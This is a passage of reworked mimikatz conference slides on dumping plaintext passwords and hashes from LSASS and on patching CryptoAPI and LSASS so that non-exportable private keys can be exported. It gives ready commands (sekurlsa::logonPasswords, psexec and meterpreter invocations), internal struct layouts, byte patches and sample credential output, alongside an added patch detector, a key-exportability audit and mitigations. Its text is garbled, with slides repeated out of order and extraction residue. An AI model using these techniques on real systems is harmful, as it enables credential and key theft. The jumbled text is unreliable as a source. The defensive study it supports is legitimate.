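    # jnz rel32 (0F 85 disp32) rewritten as nop + jmp rel32 (90 E9 disp32), displacement kept
    if original[:2] == b"\x0f\x85" and patched[:2] == b"\x90\xe9" and original[2:6] == patched[2:6]:
        return "jnz rel32 -> nop; jmp rel32 (conditional check made unconditional)"
    # jnz rel8 (75 disp8) rewritten as jmp rel8 (EB disp8), displacement kept
    if original[:1] == b"\x75" and patched[:1] == b"\xeb" and original[1:2] == patched[1:2]:
        return "jnz rel8 -> jmp rel8 (conditional check made unconditional)"
    return "unrecognised modification"


def find_patches(on_disk: bytes, in_memory: bytes) -> List[Patch]:
    """Return every run of bytes that differs between the two images of one code range."""
    if len(on_disk) != len(in_memory):
        raise ValueError("both buffers must cover the same range")
    patches: List[Patch] = []
    i, n = 0, len(on_disk)
    while i < n:
        if on_disk[i] == in_memory[i]:
            i += 1
            continue
        start = i
        while i < n and on_disk[i] != in_memory[i]:
            i += 1
        # Look at least 6 bytes ahead so an unchanged rel32 displacement is part of the window
        end = min(n, max(i, start + 6))
        patches.append(Patch(start, on_disk[start:i], in_memory[start:i],
                             describe(on_disk[start:end], in_memory[start:end])))
    return patches


def apply_patches(code: bytes, patches: Dict[int, bytes]) -> bytes:
    """Build the simulated in-memory image for the constructed test data below."""
    buf = bytearray(code)
    for offset, new_bytes in patches.items():
        buf[offset:offset + len(new_bytes)] = new_bytes
    return bytes(buf)


# Constructed stand-in for a code range; only the three jnz instructions come from the slides.
ON_DISK = bytes.fromhex(
    "55 8b ec 83 ec 10"     # filler: push ebp; mov ebp, esp; sub esp, 10h
    "0f 85 33 c7 ff ff"     # jnz continue_key_export_or_archive           (slide 43)
    "8b 45 08"              # filler: mov eax, [ebp+8]
    "0f 85 b6 3b ff ff"     # jnz continue_key_export_or_archive_prepare   (slide 43)
    "85 c0"                 # filler: test eax, eax
    "75 1c"                 # jnz short continue_key_export                (slide 49)
    "c3"                    # filler: ret
)
# The same range as it looks after the modifications described on the slides.
IN_MEMORY = apply_patches(ON_DISK, {6: b"\x90\xe9", 15: b"\x90\xe9", 23: b"\xeb"})

if __name__ == "__main__":
    for p in find_patches(ON_DISK, IN_MEMORY):
        print(f"+0x{p.offset:02x}: {p.original.hex()} -> {p.patched.hex()}  {p.description}")
```

Run against the constructed buffers, it reports three changed runs: two bytes at +0x06 and +0x0f (jnz rel32 turned into nop; jmp rel32) and one byte at +0x17 (jnz rel8 turned into jmp rel8); identical buffers produce no report. In practice the on-disk side comes from the PE file's section bytes after applying relocations for the module's load address, otherwise relocated pointers show up as false differences; this example deliberately uses no relocatable data so that step is not needed.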
mimikatz :: crypto :: patchcng :: demo time

Import, export, import as not exportable… export again

(slide 50)
mimikatz :: crypto :: patchcng :: limitations

Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…

(slide 51)
mimikatz :: crypto :: patchcng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil

certutil before and after the patch (French build, as on the slide):

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    La clé privée NE PEUT PAS être exportée
    Succès du test de chiffrement
    CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    Succès du test de chiffrement
    CertUtil : -exportPFX La commande s'est terminée correctement.

(slide 52)
mimikatz :: crypto :: memo

Some commands:

    mimikatz crypto::patchcapi crypto::exportCertificates exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
    mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it

(slide 53)
mimikatz :: crypto :: what we can do

Exactly the same as for sekurlsa: it will prevent access to accounts / computer
– no admin, no admin, no admin…
Basics
– Use smartcards / tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP / KSP
  • Their biometrics stuff was a little buggy ;)

(slide 54)
mimikatz :: what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…

(slide 55)
mimikatz :: that's all folks!

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, to always consider it as normal / acceptable
– Security friends / community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number

(slide 56)
Blog, Source Code & Contact

    blog      http://blog.gentilkiwi.com
    mimikatz  http://blog.gentilkiwi.com/mimikatz
    source    https://code.google.com/p/mimikatz
    email     benjamin@gentilkiwi.com

(slide 57)
mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks

(slide 22)
mimikatz :: sekurlsa :: livessp :: how?

Actually, I've only used a logical (empirical) approach to search passwords…
– Protocol reading
– Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDbg trap

WinDbg session (as on the slide: switch the kernel debugger to the lsass process and break on LsaProtectMemory):

    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe

    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g

(slide 23)
mimikatz :: sekurlsa :: livessp :: how?

Let's login with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider!
Yeah, Pass the Hash capability with Live account too…
Live user can logon through RDP via SSO
mimikatz :: sekurlsa :: livessp :: workflow

Workflow: LsaEnumerateLogonSessions → for each LUID: search the livessp!LiveGlobalLogonSessionList linked list for the LUID → LsaUnprotectMemory → password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos

Let's login with a normal account.
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow

Workflow: LsaEnumerateLogonSessions → for each LUID: RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow

Workflow: LsaEnumerateLogonSessions → for each LUID: search the kerberos!KerbLogonSessionList linked list for the LUID → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time!

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos “hu?”

Ok, it works…
But why?
Not at all logons on NT5 (can need an unlock).
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth:
  • password hash for shared secret, but keeping password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
– NTLM hash on client…
– KDC sent it back as a gift
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process? – Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized.
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS.
mimikatz :: sekurlsa :: LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Diagram (NT5 keys): lsasrv inside the lsass process holds g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]); mimikatz copies them into its own lsasrv instance ("copy…").
mimikatz :: sekurlsa :: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Diagram (NT6 keys): lsasrv inside the lsass process holds InitializationVector (BYTE[16]), h3DesKey and hAesKey (PKIWI_BCRYPT_KEY); mimikatz copies them into its own lsasrv instance ("copy…").

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x

	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp :
	 n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?

Basics
– No physical access to computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts: network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Let opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?

A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable

What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public in DER format
    – with private keys in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again!)

mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected?

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"

Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present

Constraint for most users
Unavailable for computer keys

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
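As an added defender-side check (example code of my own, not part of the talk or of mimikatz), the PowerShell below lists every certificate with a private key in a store and reports which API and provider hold the key and what its export flag says today, so an administrator can see which keys rest only on a software-held export flag (the CAPI CSPs and the software KSP discussed in this talk) and which sit in a smart card, TPM or HSM provider. It assumes Windows PowerShell 5.1 or later on Windows, a default store path of Cert:\CurrentUser\My, and treats only the Microsoft software providers named on these slides as "software"; classifying anything else as hardware or third-party is a heuristic.

```powershell
# Added example (not from the talk or from mimikatz): audit private-key
# exportability and provider for every certificate in a store.
# Assumes Windows PowerShell 5.1+ on Windows; the store path is an assumption.
param(
    [string]$StorePath = 'Cert:\CurrentUser\My'
)

# Microsoft software providers named in the talk: the five rsaenh.dll-based CSPs
# (crypto::patchcapi targets) and the software KSP behind KeyIso (crypto::patchcng target).
# Heuristic: a key held by any other provider is reported as hardware/third-party.
$SoftwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-PrivateKeyExportInfo {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

    $info = [ordered]@{
        Subject    = $Cert.Subject
        Thumbprint = $Cert.Thumbprint
        Api        = 'none'    # interface .NET opened the key with: CAPI (CSP) or CNG (KSP)
        Provider   = $null
        Exportable = $null     # what the export flag says today
        Software   = $null     # $true = the flag is the only thing standing between the key and an export
    }
    if (-not $Cert.HasPrivateKey) { return [pscustomobject]$info }

    try {
        # On .NET Framework this returns RSACryptoServiceProvider for CAPI keys and
        # RSACng for CNG keys; PowerShell 7 (.NET Core) returns RSACng for both,
        # so there the Api column reads CNG even for a CSP key (Provider still tells).
        $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
    } catch {
        $info.Api = 'error: ' + $_.Exception.Message
        return [pscustomobject]$info
    }

    if ($rsa -is [System.Security.Cryptography.RSACng]) {
        $key = $rsa.Key
        $info.Api      = 'CNG'
        $info.Provider = $key.Provider.Provider
        # ExportPolicy is a flags enum; AllowExport clear means "not exportable",
        # which is the check enforced inside LSASS (ncrypt!SPCryptExportKey in the talk).
        $allowExport = [System.Security.Cryptography.CngExportPolicies]::AllowExport
        $info.Exportable = (($key.ExportPolicy -band $allowExport) -ne 0)
    } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
        $csp = $rsa.CspKeyContainerInfo
        $info.Api        = 'CAPI'
        $info.Provider   = $csp.ProviderName
        $info.Exportable = $csp.Exportable    # the check rsaenh!CPExportKey enforces in-process
    } else {
        $info.Api = 'other'                   # non-RSA key (e.g. ECC): not classified here
        return [pscustomobject]$info
    }
    $info.Software = ($info.Provider -in $SoftwareProviders)
    return [pscustomobject]$info
}

$report = Get-ChildItem -Path $StorePath | ForEach-Object { Get-PrivateKeyExportInfo -Cert $_ }

# Keys that deserve attention first: software-held and already exportable, then
# software-held but flagged "not exportable" (the flag alone protects them).
$report |
    Sort-Object @{Expression = 'Software'; Descending = $true}, @{Expression = 'Exportable'; Descending = $true} |
    Format-Table Subject, Api, Provider, Exportable, Software -AutoSize
```

Run it against Cert:\LocalMachine\My from an elevated prompt to cover computer keys, which the slide notes cannot be protected by a password or popup.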
mimikatz :: crypto :: capi :: how it works?

“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported? ( level)

Diagram (CryptoAPI export flow): Process → CryptoAPI and RSA CSP → Load Private Key (DPAPI decode) → Ask to export key → Exportable? yes: Exported Key / no: NTE_BAD_KEY_STATE ("PLAYSKOOL")
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space.
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time!

Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations

Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works?

“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”

This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported? ( level)

Diagram (CNG export flow): Process → CNG → RPC → KeyIso Service (LSASS process; on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP) → Load Private Key (DPAPI decode) → Ask to export key → Exportable? yes: Exported Key / no: NTE_NOT_SUPPORTED ("PLAYSKOOL")
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK ; (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time!

Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations

Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algs than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patchcng :: bonus

After one admin has patched LSASS, all users of the current system benefit from extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil!
Before the LSASS patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the LSASS patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz / crypto: memo

Some commands:

  mimikatz crypto::patchcapi crypto::exportCertificates exit

